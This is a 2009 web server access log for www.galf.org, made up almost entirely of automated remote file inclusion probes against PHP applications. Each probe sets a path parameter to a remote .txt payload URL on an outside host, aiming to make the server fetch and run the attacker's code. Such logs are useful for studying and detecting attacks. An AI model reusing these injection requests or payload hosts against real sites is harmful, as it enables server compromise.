204.15.230.189 - - [27/Sep/2009:22:08:15 -0700] "GET /common/db.php?commonpath=http://iad4151.co.kr/cgi/data/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
204.15.230.189 - - [27/Sep/2009:22:08:15 -0700] "GET /logs//common/db.php?commonpath=http://iad4151.co.kr/cgi/data/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
204.15.230.189 - - [27/Sep/2009:22:08:50 -0700] "GET /logs/access_090608.log//common/db.php?commonpath=http://iad4151.co.kr/cgi/data/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
204.15.230.189 - - [27/Sep/2009:22:08:51 -0700] "GET /common/db.php?commonpath=http://iad4151.co.kr/cgi/data/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
204.15.230.189 - - [27/Sep/2009:22:08:51 -0700] "GET /logs//common/db.php?commonpath=http://iad4151.co.kr/cgi/data/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
8.12.161.82 - - [27/Sep/2009:22:10:26 -0700] "GET /logs/access_090420.log/error.php?dir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
204.15.230.189 - - [27/Sep/2009:22:11:44 -0700] "GET /logs/access_090615.log//common/db.php?commonpath=http://iad4151.co.kr/cgi/data/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
83.133.121.221 - - [27/Sep/2009:22:11:52 -0700] "GET /logs/access.log///appserv/main2.php?appserv_root=http://pengecutes.fileave.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
83.133.121.221 - - [27/Sep/2009:22:11:52 -0700] "GET //appserv/main2.php?appserv_root=http://pengecutes.fileave.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
83.133.121.221 - - [27/Sep/2009:22:11:52 -0700] "GET /logs/access_090706.log///appserv/main2.php?appserv_root=http://pengecutes.fileave.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
83.133.121.221 - - [27/Sep/2009:22:11:57 -0700] "GET /logs///appserv/main2.php?appserv_root=http://pengecutes.fileave.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
89.188.106.38 - - [27/Sep/2009:22:12:09 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.koreadefence.net/data/shirohige/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
89.188.106.38 - - [27/Sep/2009:22:12:09 -0700] "GET /logs/access.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.koreadefence.net/data/shirohige/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
89.188.106.38 - - [27/Sep/2009:22:12:09 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.koreadefence.net/data/shirohige/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
94.23.2.21 - - [27/Sep/2009:22:12:20 -0700] "GET /logs/?INCLUDE_FOLDER=http://nashi-deti.org.ua/plugins/editors/perkosa.txt??? HTTP/1.1" 200 4942 "-" "libwww-perl/5.831" "www.galf.org"
94.23.2.21 - - [27/Sep/2009:22:12:20 -0700] "GET /logs/access_090309.log/?INCLUDE_FOLDER=http://nashi-deti.org.ua/plugins/editors/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
94.23.2.21 - - [27/Sep/2009:22:12:25 -0700] "GET /?INCLUDE_FOLDER=http://nashi-deti.org.ua/plugins/editors/perkosa.txt??? HTTP/1.1" 200 1048 "-" "libwww-perl/5.831" "www.galf.org"
94.23.2.21 - - [27/Sep/2009:22:12:32 -0700] "GET /logs/access_090223.log/?INCLUDE_FOLDER=http://nashi-deti.org.ua/plugins/editors/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
94.23.2.21 - - [27/Sep/2009:22:12:32 -0700] "GET /logs/access_090223.log/?INCLUDE_FOLDER=http://nashi-deti.org.ua/plugins/editors/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
204.15.230.189 - - [27/Sep/2009:22:12:38 -0700] "GET /logs/access_090615.log//common/db.php?commonpath=http://iad4151.co.kr/cgi/data/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
58.184.252.3 - - [27/Sep/2009:22:13:59 -0700] "GET /logs/access_090914.log%20%20//modules/My_eGallery/index.php?basepath=http://www.partyplans.com.au/forum2/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.29.34 - - [27/Sep/2009:22:14:25 -0700] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://visualSide.fileave.com/id/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.29.34 - - [27/Sep/2009:22:14:25 -0700] "GET /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://visualSide.fileave.com/id/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.29.34 - - [27/Sep/2009:22:14:25 -0700] "GET /logs/access_090831.log%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://visualSide.fileave.com/id/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.29.34 - - [27/Sep/2009:22:14:26 -0700] "GET /logs/access_090511.log%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://visualSide.fileave.com/id/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
94.23.2.21 - - [27/Sep/2009:22:17:08 -0700] "GET /logs/access_090309.log%20/?INCLUDE_FOLDER=http://nashi-deti.org.ua/plugins/editors/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
94.23.2.21 - - [27/Sep/2009:22:17:12 -0700] "GET /logs/access_090309.log%20/?INCLUDE_FOLDER=http://nashi-deti.org.ua/plugins/editors/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
70.38.112.174 - - [27/Sep/2009:22:19:39 -0700] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://shephoe.fileave.com/fxid1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
70.38.112.174 - - [27/Sep/2009:22:19:39 -0700] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://shephoe.fileave.com/fxid1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
70.38.112.174 - - [27/Sep/2009:22:19:39 -0700] "GET /logs/access_090525.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://shephoe.fileave.com/fxid1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
70.38.112.174 - - [27/Sep/2009:22:19:49 -0700] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://shephoe.fileave.com/fxid1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
70.38.112.174 - - [27/Sep/2009:22:19:50 -0700] "GET /logs/access_090525.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://shephoe.fileave.com/fxid1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
70.38.112.174 - - [27/Sep/2009:22:19:50 -0700] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://shephoe.fileave.com/fxid1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
70.38.112.174 - - [27/Sep/2009:22:19:59 -0700] "GET /logs/access.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://shephoe.fileave.com/fxid1.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
70.38.112.174 - - [27/Sep/2009:22:20:11 -0700] "GET /logs/access.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://shephoe.fileave.com/fxid1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.135.134.78 - - [27/Sep/2009:22:21:19 -0700] "GET /logs/access_090914.log//?_SERVER[DOCUMENT_ROOT]=http://www.ssp.co.id/admin/admin/id1old?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.184.252.3 - - [27/Sep/2009:22:21:43 -0700] "GET /logs/access_090406.log%20%20//modules/My_eGallery/index.php?basepath=http://www.partyplans.com.au/forum2/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
83.133.121.221 - - [27/Sep/2009:22:22:57 -0700] "GET /logs/access_090518.log///appserv/main2.php?appserv_root=http://pengecutes.fileave.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
83.133.121.221 - - [27/Sep/2009:22:22:57 -0700] "GET /logs///appserv/main2.php?appserv_root=http://pengecutes.fileave.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
83.133.121.221 - - [27/Sep/2009:22:22:57 -0700] "GET //appserv/main2.php?appserv_root=http://pengecutes.fileave.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
121.101.214.54 - - [27/Sep/2009:22:23:45 -0700] "GET /?sourcedir=http://www.zytologie.de//id1.txt???? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [27/Sep/2009:22:23:45 -0700] "GET /logs/?sourcedir=http://www.zytologie.de//id1.txt???? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [27/Sep/2009:22:23:48 -0700] "GET /logs/access_090518.log/?sourcedir=http://www.zytologie.de//id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
74.6.22.88 - - [27/Sep/2009:22:24:06 -0700] "GET /?S=A HTTP/1.0" 200 1032 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
121.101.214.54 - - [27/Sep/2009:22:24:09 -0700] "GET /logs/access_090518.log/?sourcedir=http://www.zytologie.de//id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [27/Sep/2009:22:24:10 -0700] "GET /logs/?sourcedir=http://www.zytologie.de//id1.txt???? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [27/Sep/2009:22:24:13 -0700] "GET /?sourcedir=http://www.zytologie.de//id1.txt???? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [27/Sep/2009:22:24:54 -0700] "GET //appserv/main2.php?appserv_root=http://ulsanmis.pe.kr/bbs/admin/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [27/Sep/2009:22:24:54 -0700] "GET /logs/access_090601.log///appserv/main2.php?appserv_root=http://ulsanmis.pe.kr/bbs/admin/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [27/Sep/2009:22:24:55 -0700] "GET /logs///appserv/main2.php?appserv_root=http://ulsanmis.pe.kr/bbs/admin/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [27/Sep/2009:22:25:01 -0700] "GET /logs/access_090518.log%20%20/?sourcedir=http://www.zytologie.de//id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [27/Sep/2009:22:27:33 -0700] "GET /logs/access_090406.log%20%20/?sourcedir=http://www.zytologie.de//id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
203.185.129.36 - - [27/Sep/2009:22:27:52 -0700] "GET /logs/access_090309.log//?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
203.185.129.36 - - [27/Sep/2009:22:28:00 -0700] "GET /logs/access_090914.log//?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
94.23.2.21 - - [27/Sep/2009:22:28:58 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://nashi-deti.org.ua/plugins/editors/perkosa.txt??? HTTP/1.1" 200 1048 "-" "libwww-perl/5.831" "www.galf.org"
94.23.2.21 - - [27/Sep/2009:22:28:58 -0700] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://nashi-deti.org.ua/plugins/editors/perkosa.txt??? HTTP/1.1" 200 4942 "-" "libwww-perl/5.831" "www.galf.org"
94.23.2.21 - - [27/Sep/2009:22:28:59 -0700] "GET /logs/access.log/?_SERVER[DOCUMENT_ROOT]=http://nashi-deti.org.ua/plugins/editors/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
94.23.2.21 - - [27/Sep/2009:22:28:59 -0700] "GET /logs/access_090914.log/?_SERVER[DOCUMENT_ROOT]=http://nashi-deti.org.ua/plugins/editors/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
94.23.2.21 - - [27/Sep/2009:22:29:07 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://nashi-deti.org.ua/plugins/editors/perkosa.txt??? HTTP/1.1" 200 1048 "-" "libwww-perl/5.831" "www.galf.org"
94.23.2.21 - - [27/Sep/2009:22:29:07 -0700] "GET /logs/access.log/?_SERVER[DOCUMENT_ROOT]=http://nashi-deti.org.ua/plugins/editors/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
94.23.2.21 - - [27/Sep/2009:22:29:07 -0700] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://nashi-deti.org.ua/plugins/editors/perkosa.txt??? HTTP/1.1" 200 4942 "-" "libwww-perl/5.831" "www.galf.org"
94.23.2.21 - - [27/Sep/2009:22:29:08 -0700] "GET /logs/access_090914.log/?_SERVER[DOCUMENT_ROOT]=http://nashi-deti.org.ua/plugins/editors/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
129.215.82.1 - - [27/Sep/2009:22:29:46 -0700] "GET /excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.215.82.1 - - [27/Sep/2009:22:29:46 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.215.82.1 - - [27/Sep/2009:22:29:46 -0700] "GET /logs/access_090511.log%20%20//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.215.82.1 - - [27/Sep/2009:22:29:46 -0700] "GET /logs/access_090907.log%20%20//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [27/Sep/2009:22:29:48 -0700] "GET /logs/access_090518.log%20%20/?sourcedir=http://www.zytologie.de//id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.214.49.24 - - [27/Sep/2009:22:30:55 -0700] "GET /bbs/skin/happycast_blue/setup.php?dir=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.214.49.24 - - [27/Sep/2009:22:30:55 -0700] "GET /logs//bbs/skin/happycast_blue/setup.php?dir=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.214.49.24 - - [27/Sep/2009:22:30:55 -0700] "GET /logs/access_090420.log%20%20//bbs/skin/happycast_blue/setup.php?dir=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.214.49.24 - - [27/Sep/2009:22:30:59 -0700] "GET /bbs/skin/happycast_blue/setup.php?dir=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.214.49.24 - - [27/Sep/2009:22:30:59 -0700] "GET /logs/access_090420.log%20%20//bbs/skin/happycast_blue/setup.php?dir=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.214.49.24 - - [27/Sep/2009:22:30:59 -0700] "GET /logs//bbs/skin/happycast_blue/setup.php?dir=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.214.49.24 - - [27/Sep/2009:22:31:04 -0700] "GET /logs/access_090907.log%20%20//bbs/skin/happycast_blue/setup.php?dir=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.214.49.24 - - [27/Sep/2009:22:31:05 -0700] "GET /logs/access_090907.log%20%20//bbs/skin/happycast_blue/setup.php?dir=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [27/Sep/2009:22:32:10 -0700] "GET /logs/access_090406.log%20%20/?sourcedir=http://www.zytologie.de//id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.215.82.1 - - [27/Sep/2009:22:33:30 -0700] "GET /logs/access_090511.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://unixstats.org/tools/idxx.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.215.82.1 - - [27/Sep/2009:22:33:30 -0700] "GET /logs/access_090907.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.214.49.24 - - [27/Sep/2009:22:34:29 -0700] "GET /logs/access_090420.log//bbs/skin/happycast_blue/setup.php?dir=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.214.49.24 - - [27/Sep/2009:22:34:29 -0700] "GET /logs/access_090907.log//bbs/skin/happycast_blue/setup.php?dir=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.215.82.1 - - [27/Sep/2009:22:34:32 -0700] "GET /index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.215.82.1 - - [27/Sep/2009:22:34:32 -0700] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.215.82.1 - - [27/Sep/2009:22:34:32 -0700] "GET /logs/access_090420.log%20%20//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.214.49.24 - - [27/Sep/2009:22:34:39 -0700] "GET /logs/access_090420.log//bbs/skin/happycast_blue/setup.php?dir=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.214.49.24 - - [27/Sep/2009:22:34:43 -0700] "GET /logs/access_090907.log//bbs/skin/happycast_blue/setup.php?dir=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.215.82.1 - - [27/Sep/2009:22:34:59 -0700] "GET /logs/access.log%20%20//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.215.82.1 - - [27/Sep/2009:22:37:35 -0700] "GET /logs/access_090420.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.215.82.1 - - [27/Sep/2009:22:37:39 -0700] "GET /logs/access.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.29.34 - - [27/Sep/2009:22:38:48 -0700] "GET /common/db.php?commonpath=http://www.meililai.co.kr/bbs//zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.29.34 - - [27/Sep/2009:22:38:52 -0700] "GET /logs//common/db.php?commonpath=http://www.meililai.co.kr/bbs//zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.29.34 - - [27/Sep/2009:22:38:52 -0700] "GET /logs/access_090608.log%20%20//common/db.php?commonpath=http://www.meililai.co.kr/bbs//zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.29.34 - - [27/Sep/2009:22:38:57 -0700] "GET /logs//common/db.php?commonpath=http://www.meililai.co.kr/bbs//zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.29.34 - - [27/Sep/2009:22:38:57 -0700] "GET /logs/access_090608.log%20%20//common/db.php?commonpath=http://www.meililai.co.kr/bbs//zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.29.34 - - [27/Sep/2009:22:38:57 -0700] "GET /common/db.php?commonpath=http://www.meililai.co.kr/bbs//zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.29.34 - - [27/Sep/2009:22:39:12 -0700] "GET /logs/access_090615.log%20%20//common/db.php?commonpath=http://www.meililai.co.kr/bbs//zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.29.34 - - [27/Sep/2009:22:39:24 -0700] "GET /logs/access_090615.log%20%20//common/db.php?commonpath=http://www.meililai.co.kr/bbs//zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [27/Sep/2009:22:39:45 -0700] "GET /logs/access_090824.log//viewbody.html?code=http://www.birdmobile.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [27/Sep/2009:22:39:45 -0700] "GET /logs//viewbody.html?code=http://www.birdmobile.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [27/Sep/2009:22:39:46 -0700] "GET /viewbody.html?code=http://www.birdmobile.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [27/Sep/2009:22:39:54 -0700] "GET /logs/access_090914.log//viewbody.html?code=http://www.birdmobile.net/fx29id1.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [27/Sep/2009:22:41:11 -0700] "GET /logs//viewbody.html?code=http://www.birdmobile.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [27/Sep/2009:22:41:11 -0700] "GET /viewbody.html?code=http://www.birdmobile.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [27/Sep/2009:22:41:13 -0700] "GET /logs/access_090824.log//viewbody.html?code=http://www.birdmobile.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [27/Sep/2009:22:41:21 -0700] "GET /logs/access_090914.log//viewbody.html?code=http://www.birdmobile.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [27/Sep/2009:22:42:20 -0700] "GET /viewbody.html?code=http://www.birdmobile.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [27/Sep/2009:22:42:20 -0700] "GET /logs/access_090824.log%20%20//viewbody.html?code=http://www.birdmobile.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [27/Sep/2009:22:42:20 -0700] "GET /logs//viewbody.html?code=http://www.birdmobile.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [27/Sep/2009:22:42:24 -0700] "GET /logs/access_090914.log%20%20//viewbody.html?code=http://www.birdmobile.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
70.38.112.174 - - [27/Sep/2009:22:42:46 -0700] "GET /logs/access_090810.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://shephoe.fileave.com/fxid1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [27/Sep/2009:22:42:49 -0700] "GET /logs/access_090824.log//viewbody.html?code=http://www.birdmobile.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
70.38.112.174 - - [27/Sep/2009:22:42:55 -0700] "GET /logs/access_090525.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://shephoe.fileave.com/fxid1.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
70.38.112.174 - - [27/Sep/2009:22:42:55 -0700] "GET /logs/access_090810.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://shephoe.fileave.com/fxid1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [27/Sep/2009:22:42:59 -0700] "GET /logs/access_090914.log//viewbody.html?code=http://www.birdmobile.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
70.38.112.174 - - [27/Sep/2009:22:43:02 -0700] "GET /logs/access_090525.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://shephoe.fileave.com/fxid1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [27/Sep/2009:22:43:07 -0700] "GET /viewbody.html?code=http://www.birdmobile.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [27/Sep/2009:22:43:07 -0700] "GET /logs//viewbody.html?code=http://www.birdmobile.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [27/Sep/2009:22:43:07 -0700] "GET /logs/access_090824.log//viewbody.html?code=http://www.birdmobile.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [27/Sep/2009:22:43:16 -0700] "GET /logs/access_090914.log//viewbody.html?code=http://www.birdmobile.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
77.37.18.233 - - [27/Sep/2009:22:43:59 -0700] "GET /logs/access_090622.log///?path[docroot]=http://www.karuturi.com/baner.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
77.37.18.233 - - [27/Sep/2009:22:43:59 -0700] "GET //?path[docroot]=http://www.karuturi.com/baner.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
77.37.18.233 - - [27/Sep/2009:22:43:59 -0700] "GET /logs///?path[docroot]=http://www.karuturi.com/baner.txt??? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.galf.org"
77.37.18.233 - - [27/Sep/2009:22:44:42 -0700] "GET /logs/access_090706.log///?path[docroot]=http://www.karuturi.com/baner.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
213.175.211.6 - - [27/Sep/2009:22:45:49 -0700] "GET /logs/access_090518.log//?sourcedir=http://we.sg/bash/yes.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.175.211.6 - - [27/Sep/2009:22:45:49 -0700] "GET /?sourcedir=http://we.sg/bash/yes.txt???? HTTP/1.1" 200 1048 "-" "libwww-perl/5.805" "www.galf.org"
213.175.211.6 - - [27/Sep/2009:22:45:50 -0700] "GET /logs//?sourcedir=http://we.sg/bash/yes.txt???? HTTP/1.1" 200 4947 "-" "libwww-perl/5.805" "www.galf.org"
